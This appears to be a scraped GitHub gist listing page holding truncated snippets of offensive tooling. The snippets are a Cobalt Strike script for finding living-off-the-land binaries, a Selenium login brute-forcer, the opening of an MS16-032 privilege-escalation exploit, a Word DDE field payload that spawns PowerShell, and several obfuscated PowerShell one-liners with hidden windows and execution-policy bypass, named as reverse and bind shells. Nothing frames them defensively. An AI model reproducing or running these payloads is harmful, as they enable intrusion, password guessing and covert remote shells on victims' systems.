Skip to content

Instantly share code, notes, and snippets.

View nessus_parser.py
import requests
import json
from docx import Document
A_KEY = ""
S_KEY = ""
headers = {"X-ApiKeys": "accessKey=; secretKey="}
BASE_URL = "https://localhost:8834"
@frknozr
frknozr / lolbin.cna
Created Nov 12, 2018
Lolbin Finder Aggressor
View lolbin.cna
@lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Cmstp.exe","Diskshadow.exe","Dnscmd.exe","Extexport.exe","Forfiles.exe","Gpscript.exe","Hh.exe","Ie4unit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Regasm.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Wab.exe","Wmic.exe","Xwizard.exe");
beacon_command_register("lolbin", "Queries the System for all major lolbin products installed",
"Syntax: lolbin\n" .
"Checks for installed lolbin products");
alias lolbin {
$bid = $1;
$function = $2;
View brute.py
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from time import sleep
options = Options()
#options.add_argument("--headless")
driver = webdriver.Chrome(chrome_options=options,executable_path="chromedriver")
user_pass = "" # space seperated
View test.xml
<?XML version="1.0"?>
<scriptlet>
<registration remotable="True" version="1.0" desription="desription">
<script language="VBScript">
<![CDATA[
Msgbox("Message")
]]>
View test
vjTNELvUZXQAAAAAAAAClyVJtWzyZP1GJDNuHYs_9-MS182GzoVSkvYFYmH2-lOI
View privshell.ps1
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
Targets:
View dde
{SET C "{QUOTE 67 58 92 92 80 114 111 103 114 97 109 115 92 92 77 105 99 114 111 115 111 102 116 92 92 79 102 102 105 99 101 92 92 77 83 87 111 114 100 46 101 120 101 92 92 46 46 92 92 46 46 92 92 46 46 92 92 46 46 92 92 119 105 110 100 111 119 115 92 92 115 121 115 116 101 109 51 50 92 92 119 105 110 100 111 119 115 112 111 119 101 114 115 104 101 108 108 92 92 118 49 46 48 92 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101} "}
{DDE {REF C} "a"}
View revremote.ps1
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIANOxYVoCA51W227bOBB991cMvNpaQixCcdvdIECKdZW0DZC2RuVtHgwDoaVxrI1MuiTlCxL/e0mJsuQ4QZvViy1yeObMmQv1Bwz4CsU0Z+DDtUiVQgaTDbzXP8NcMBTwCs7pEuETFcmm1dKWsUo5g4+o/GucxFmKTEHrvgX6cVYxnMEXXPlfJ/9hrMAfbhb4hc5RLyqi7cPCvjIm/0o8xynNMxUKTPROSjOpIRwlctxZDQRfb8gjC73eWKlsW9ua4qIKrXUPxf6ACjp3y/+jSImU3Y6dkM/nlCXd/dVIZjFnjxbP+YplnCbFqmcxBY9RSrACzHmSZ2gI/uN6UJqkU3ArN+DjD2hPUpa0vWKzPFeczVKp5deSn2mXG/1/ToxqEY/vUEkyjBdX1mJ8EpwEhweJVFQo49d6LnZtis4adv04xoXSgGU63JLK9jm6ApcoJB4y3kE3Uv4U83BgHbVfvyG9N6/J8d9vyclf7a6JwzpvlQJKJZDODdsSnOhCi4o1zbLmV+anpGdqpW3T0SAnZRZVYM/wwzjXNb8hUWXqWv9dZ6qLCrvuvTPU6FvwqYTR3plvOOcKQxQqnaYxVfidZmlCTeWFNMsmNL4be94TdEg/VzNTtuZQXz6tjNdIYC1JHVJTs9Fko3A0Hjvm15ReQEgv0M/Dn/fB1sqKLKm23ZHCtSLIYp6Yuj497Ufh5aVnpH5vbNz2tS5QvpLldIhmmGUgcsa0NWghcqmLtA1H4CBbnpo3Zlr8SK/pnOw2Yj5f5KrevGEhX2xEejtT4IYe9ILjt/A5jQWXfKog5GLBRSEggb7xaCwlCNQOl
View gist:31b97476330242cac87d4afea833b62e
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAKqwYVoCA51WXW/bNhR996+48LRaQixCMbohDZBirpJuAbLWqLzlwTAQWrqOtcikRlL+QOL/XlKiLDlO0GV6sUVennvuuR/UTzDiaxTzgoEPtyJVChnMtvBJ/4wLwVDAO7ikK4Q/qEi2nY62jFXKGfyOyr/FWZylyBR0HjugH2cdwwV8wbX/dfYPxgr88TbHL3SJelERbR+W9rUx+UviJc5pkalQYKJ3UppJDeEoUeDeaiT4ZkueWej11kpt29k1FPM6tM4jlPsjKujSrf5PIiVSdj91Qr5cUpb0D1cjmcWcPVu85GuWcZqUq57FFDxGKcEKsORJkaEh+JvrQWWSzsGt3YCP/0J3lrKk65Wb1bnybJZKLb+W/EK73Or/S2JUi3j8gEqScZzfWIvpWXAWHB8kUlGhjF/rudy1Kbpo2Q3jGHOlAat0uBWV3Wt0Ba5QSDxmvIdupfwl5uHIOuqefhiQ01/PyAcyeD/o9k0c1nmnElAqgXRp2FbgRBdaVK5plg2/Kj8VPVMrXZuOFjkps6gGe4UfxoWu+S2JalPX+u87c11U2HcfnbFG34FPJUwOznzDJVcYolDpPI2pwr9plibUVF5Is2xG44ep571AhwwLtTBlaw4N5cvKeK0ENpI0IbU1m8y2CifTqWN+TekFhAwC/Tz9/BjsrKzIknrbnSjcKIIs5omp6/PzYRReX3tG6k/Gxu3e6gLla1lNh2iBWQaiYExbgxaikLpIu3ACDrLVuXljpsVP9JrOyX4j5su8UM3mHQt5vhXp/UKBG3owCE5/gT/TWHDJ5wpCLnIuSgEJDI1HYylBoHaww
View bind.ps1
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIyuYVoCA51WW2/bNhR+96848LRaQixCDTCgCJBiqZJuAbLWqNzmwTAQmjqOtcikR1K+IPF/HylRF8cJukwvtsjD73znOxfqFxiJDcp5wSGEW5lpjRxmO/hkfsaF5CjhHVzSNcKfVKa7Xs9YMp0JDn+gDm9xxvIMuYbeYw/M420YnMMX3IRfZ38j0xCOdyv8QpdoFjUx9nFpXxuT7wovcU6LXMcSU7OT0VwZCE/LAhurkRTbHXlmYdY7K7Vtb99SXNWh9R6h3B9RSZd+9X+SaJnx+6kXi+WS8nR4uJqonAn+bPFSbHguaFquBg5TCoZKgRNgKdIiR0vwdz+AyiSbg1+7gRD/gf4s42k/KDerc+XZPFNGfiP5uXG5M/+XxKqWCPaAWpExW904i+mH6EN0fJAoTaW2fp3nctel6Lxjd8EYrrQBrNLhV1T2r9GVuEap8JhxA91J+UvM45Fz1O8PLXXnr1dpprREurQEKzxiaisp1wyxllKVkoqRLY++y0CHj1J5UoO9QglZYcp8R5La1Hf+h97c1BEO/UdvbND3EFIFk4Mz33ApNMYodTbPGNX4g+ZZSm2xxTTPZ5Q9TIPgBTrkotALW6n20IVqxAg6aWpVaKPoyjSZ7TROplPP/toCiwg5jczz9OtjtHdKIk/rbX+icasJciZSW71nZxdJfH0dWHU/WRu/f2vKUGxUNQOSBeY5yIJzYw0m9kKZUuzDCXjI12f2jdtGPjFrJg3NBhPLVaHbzTsei9VOZvcLDX4cwGn0/jf4K2NSKDHXEAu5ErLUjMCF9WgtFUg0DtaYkjt+x12lOU2IHUzot
You can’t perform that action at this time.